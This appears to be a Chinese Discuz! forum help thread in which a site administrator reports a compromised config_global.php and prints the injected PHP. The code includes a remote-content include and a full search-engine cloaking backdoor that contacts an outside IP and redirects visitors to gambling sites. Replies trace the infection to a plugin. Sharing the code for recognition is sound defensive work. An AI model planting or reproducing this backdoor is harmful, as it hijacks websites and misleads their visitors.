Discuz! 官方站

 找回密码
 立即注册

QQ登录

只需一步,快速开始

Discuz! Q 1.0 正式发布,5 分钟快速生成粉丝社区,助力内容创作者快速变现
搜索
查看: 7895|回复: 10

[求助] config_global.php 配置文件再次被黑客改动

[复制链接]
发表于 2016-7-11 20:11:35 | 显示全部楼层 |阅读模式
DNSPod 新春好礼 - 域名低至 1 元起,代金券大礼包暖心送!
本帖最后由 上网溜达 于 2016-7-11 20:16 编辑

一个朋友网站的 配置文件 config_global.php 再次被黑客改动,让网站被访问时自动跳转到两个博彩违法网站。
小编在这里分享出代码供大家参考,希望对大家有用。
第一次被修改配置文件,在第99行增加的代码如下:
$foot="data/16-g.html";
$footer=@file_get_contents("http://www.此处保密.com/data/flashdata/default/".$foot);
echo $footer;


本次更加具有特色:
增加了
1、show.php文件
2、news 文件夹  这个文件夹里面有成千上万的静态网页,估计这位黑客大哥估计废了不少心思来做的吧
3、new 文件夹  这个文件夹是空的
4、配置文件 config_global.php 的第83行被增加代码如下:


set_time_limit(20);error_reporting(0);
define('u_b','/');
define('s_u','http://104.202.66.106/');
define('s_s','@haosou.com|360.cn|baidu|spider|360spider|so|360|sogou|sm.cn|youdao@i');
define('h_t',$_SERVER['SERVER_NAME']);define('r_s',$_SERVER['HTTP_REFERER']);define('u_s',$_SERVER['HTTP_USER_AGENT']);define('h_z',s_p());
function s_p(){$d='';if(isset($_SERVER['REQUEST_URI'])){$d=$_SERVER['REQUEST_URI'];}else{if(isset($_SERVER['argv'])){$d=$_SERVER['PHP_SELF'].'?'.$_SERVER['argv'][0];}else{$d=$_SERVER['PHP_SELF'].'?'.$_SERVER['QUERY_STRING'];}}if(isset($_SERVER['SERVER_SOFTWARE']) && false!==stristr($_SERVER['SERVER_SOFTWARE'],'IIS')){if(function_exists('mb_convert_encoding')){$d=mb_convert_encoding($d,'UTF-8','GBK');}else{$d=@iconv('GBK','UTF-8',@iconv('UTF-8','GBK',$d))==$d?$diconv('GBK','UTF-8',$d);}}$r=explode('#',$d,2);$d=$r[0];return $d;}function r_s($url){$o=array('http' => array('method'=>"GET",'timeout'=>8));$context=stream_context_create($o);$h=file_get_contents($url,false,$context);if(empty($h)){$h=file_get_contents($url);}return $h;}
if(preg_match(s_s,r_s)){$d_s=true;if(preg_match("@site%3A|inurl%3A@i",r_s)){setcookie('xx',h_t,time()+259200);$d_s=false;}if($d_s ){setcookie('xx',h_t,time()+259200);$d_u=s_u.'?xu='.bin2hex(h_z);$d_u.='&ad=1&xh='.bin2hex(h_t);$d_c=r_s($d_u);header("Location: ".$d_c.'?'.h_t);exit;}}if(strstr(h_z,u_b)){if(preg_match(s_s,u_s)){$d_u=s_u.'?xu='.bin2hex(h_z);$d_u.='&xh='.bin2hex(h_t);$d_c=r_s($d_u);echo $d_c;exit;}}


就是这些代码就能让你的网站出现自动跳转。黑客的目的只有一个,就是为了帮助宣传某违法网站。
在此警告一下心存侥幸的这位黑手,为了点小钱,竟然对一个没有流量的地方公益类型小论坛下黑手。想必你也是一时冲动,为了眼前一点小利益,犯下错误。听我一句,悬崖勒马,回头是岸,既往不追。再来一次,一定上报公安局处理。
做事的时候,服务器日志别忘记清除哟。
 楼主| 发表于 2016-8-5 19:39:14 | 显示全部楼层
问题已经彻底处理好,是因为在后台安装了一个插件导致的。
回复

使用道具 举报

发表于 2016-8-6 13:34:16 | 显示全部楼层
什么插件  曝光一下呗   我的也出现了类似的问题
回复

使用道具 举报

发表于 2016-8-6 13:47:55 | 显示全部楼层
中毒了 尽快清理 做好服务器安全哦
回复

使用道具 举报

发表于 2016-8-9 21:03:41 | 显示全部楼层
楼主留下QQ 我也出现这样的问题。。。
回复

使用道具 举报

发表于 2016-8-10 17:37:31 | 显示全部楼层
请问LZ是装了什么插件导致的?
回复

使用道具 举报

发表于 2020-1-4 10:30:35 | 显示全部楼层
我没有按插件一样被黑,不知道是什么原因?
回复

使用道具 举报

发表于 2020-1-4 19:13:09 | 显示全部楼层
网上经常有些免费插件基本都有病毒。我的就是,现在还解决不了
回复

使用道具 举报

发表于 2020-1-6 23:04:33 | 显示全部楼层
哪里下载的插件 或者插件名称发不出来才行
回复

使用道具 举报

发表于 2020-7-29 22:13:19 | 显示全部楼层
我的站点提示这个文件有问题,我是新手,我看不出来,可否指点
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Discuz! Q 1.0 正式发布,5 分钟快速生成粉丝社区,助力内容创作者快速变现

小黑屋|Discuz! 官方站 ( 粤B2-20090059-165 )star

GMT+8, 2020-8-7 20:49

Powered by Discuz! X3.3

Copyright © 2001-2019 Tencent Cloud.

快速回复 返回顶部 返回列表